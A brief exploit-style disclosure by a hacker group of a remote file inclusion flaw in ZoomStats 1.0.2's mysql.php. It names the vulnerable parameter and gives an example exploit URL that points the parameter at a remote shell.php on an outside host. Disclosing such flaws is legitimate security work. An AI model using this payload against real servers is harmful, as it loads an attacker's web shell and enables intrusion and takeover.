ZoomStats suffers from a remote file inclusion vulnerability.
bd26ca36d15c1ddce78d401c9761bdb70376f9fb7faff06eed5ee90699321428
<div id="_htmlarea_default_style_" style="font:10pt arial,helvetica,sans-serif">###### ToXiC #########################<br>#<br>#BuG FounD by Drago84<br>#<br>#Application Affect:<span>ZoomStats<br></span>#Source Code:<br>#https://prdownloads.sourceforge.net/zoomstats/ZoomStats-v1.0.2.zip?use_mirror=kent<br>#Problem:<br>#$GLOBALS['lib']['db']['path'] array not declare<br>#Solution : $GLOBALS['lib']['db']['path']<br>#Page Vulnerable : mysql.php<br>#Dir Page: /libs/dbmax/<br># Exempe Of ExPloit is:<br>#https://www.site.com/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=https://marcusbestlamer.gay/shell.php?<br>#GrEatZ All Member of ToXiC, Str0ke<br># ToXic
Security
<br>######
ToXiC
###Drago84###############</div>